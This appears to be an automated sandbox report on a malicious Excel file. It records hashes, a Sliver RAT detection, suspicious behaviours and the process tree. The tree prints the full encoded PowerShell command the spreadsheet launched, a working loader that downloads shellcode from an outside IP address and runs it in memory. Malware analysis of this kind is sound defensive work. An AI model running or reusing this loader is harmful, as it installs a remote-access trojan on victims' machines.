Analysis
-
max time kernel
57s -
max time network
58s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
11-11-2024 21:53
Behavioral task
behavioral1
Sample
29c4b9dd411a6cbf5ac4c479aabcad90cdd8e1228509df7918920b7bf7d89527.xls
Resource
win7-20240903-en
General
-
Target
29c4b9dd411a6cbf5ac4c479aabcad90cdd8e1228509df7918920b7bf7d89527.xls
-
Size
46KB
-
MD5
20118dff69247ba2005af86a2d37c4a5
-
SHA1
a17d3a00fcbc2c7d88f9d351bc6a03efd3a3e867
-
SHA256
29c4b9dd411a6cbf5ac4c479aabcad90cdd8e1228509df7918920b7bf7d89527
-
SHA512
60763b30fbba621f581a2b470f40a7d6d45755e4c661c80d4b1fd845fc5441203c9e2bf51ff62bd7e6086d0650ccee72614b32b09ad14731f2b4626d182c49c8
-
SSDEEP
768:b4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:sSFsv66g3KnF439NKC54kkGfn+cL2Xd+
Malware Config
Extracted
https://194.182.164.149:8080/fontawesome.woff
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 1624 1420 powershell.exe 82 -
Sliver RAT v2 5 IoCs
Processes:
resource yara_rule behavioral2/memory/1624-71-0x00000188789E0000-0x000001887945E000-memory.dmp SliverRAT_v2 behavioral2/memory/1624-73-0x0000018879EE0000-0x000001887A9C6000-memory.dmp SliverRAT_v2 behavioral2/memory/1624-75-0x0000018879EE0000-0x000001887A9C6000-memory.dmp SliverRAT_v2 behavioral2/memory/1624-74-0x0000018879EE0000-0x000001887A9C6000-memory.dmp SliverRAT_v2 behavioral2/memory/1624-72-0x0000018879EE0000-0x000001887A9C6000-memory.dmp SliverRAT_v2 -
Sliver family
-
Blocklisted process makes network request 21 IoCs
Processes:
powershell.exeflow pid Process 23 1624 powershell.exe 26 1624 powershell.exe 40 1624 powershell.exe 41 1624 powershell.exe 42 1624 powershell.exe 43 1624 powershell.exe 44 1624 powershell.exe 45 1624 powershell.exe 46 1624 powershell.exe 47 1624 powershell.exe 48 1624 powershell.exe 60 1624 powershell.exe 63 1624 powershell.exe 64 1624 powershell.exe 65 1624 powershell.exe 66 1624 powershell.exe 67 1624 powershell.exe 68 1624 powershell.exe 69 1624 powershell.exe 70 1624 powershell.exe 71 1624 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid Process 1420 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid Process 1624 powershell.exe 1624 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid Process Token: SeDebugPrivilege 1624 powershell.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
EXCEL.EXEpid Process 1420 EXCEL.EXE 1420 EXCEL.EXE 1420 EXCEL.EXE 1420 EXCEL.EXE 1420 EXCEL.EXE 1420 EXCEL.EXE 1420 EXCEL.EXE 1420 EXCEL.EXE 1420 EXCEL.EXE 1420 EXCEL.EXE 1420 EXCEL.EXE 1420 EXCEL.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
EXCEL.EXEpowershell.execsc.exedescription pid Process procid_target PID 1420 wrote to memory of 1624 1420 EXCEL.EXE 86 PID 1420 wrote to memory of 1624 1420 EXCEL.EXE 86 PID 1624 wrote to memory of 4728 1624 powershell.exe 89 PID 1624 wrote to memory of 4728 1624 powershell.exe 89 PID 4728 wrote to memory of 4908 4728 csc.exe 90 PID 4728 wrote to memory of 4908 4728 csc.exe 90
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\29c4b9dd411a6cbf5ac4c479aabcad90cdd8e1228509df7918920b7bf7d89527.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1420 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1624 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\oosj4cuh\oosj4cuh.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:4728 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES81D2.tmp" "c:\Users\Admin\AppData\Local\Temp\oosj4cuh\CSC4ED83423C804432B61358D120A42673.TMP"4⤵PID:4908
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD564c6fdcb373bad218fbb6692b3dd04c5
SHA1e097bbbd9d21822c9506390fffcac4700fdd70e5
SHA2564674a68026abfb148cad1e7dee6908042875449566b2b1a74a315b92ba503424
SHA51284e24e17daba4668b2e3c1a0127d0efa8abb34a22cef2386ee89bbd93ddd8698c7a1c42a156a08a32da4644f5dbdf136f8b0db3c42699d92046f0b30d969124d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD566d27a7a0c59564515d3ed4570f9538f
SHA19f45faa128818d84773c1a2cddd8da655ac29bb9
SHA256f48a045b0ece39a4def0064f16f93932687cf2a7a45d8171d864801e834c8e3c
SHA51286002f764089e1a514147aeecb2643d77190ee3de984165e4f5aed2211cd1c53a7f898ba32b402f7e405245d35070aafb022e4b5d2593e6ed08f4d7f63204787
-
Filesize
652B
MD55b32b1aea303ba69ef860f14d1e7c53d
SHA119e5e197fed3b5f3260e4f99b2e1bc0dc0af2326
SHA256f9758369389ec2a85c7e7f79e428922a1f3ea608fa1ccdbb3d8f81aba2a5210f
SHA512aee512d85acdf3bbb269fe2f887eebcaa18a343d39e844c1fad466c0fea97e84f8f2425b4b7a89159eaaf1575494be638baed644e97f3d64b6e1d3f81bf818fb
-
Filesize
631B
MD5f4dd5c682eb7b3b679f084261bfc7c4c
SHA170f75d7a4e42c185eb09139ed3c6f7338a2219c2
SHA2562908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319
SHA5128f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d
-
Filesize
369B
MD55ce9be903139bc1683ff6bd8cfdb8f39
SHA158ea58edc8194a7ff9d9eeb9b6c85309f946164f
SHA256e58097f2c601f768a208351e3d7fbac81e87b16c9d6f2db532951f2c2fab1fc1
SHA512dff6b5b2d6edcd8d7fd68329072b866465018634a5acaf0a668f3622c8bd3502b94ca960926103d4e8c82ecb8ee6bfe6dd8527d10fce27662ba0c07b6e28cde5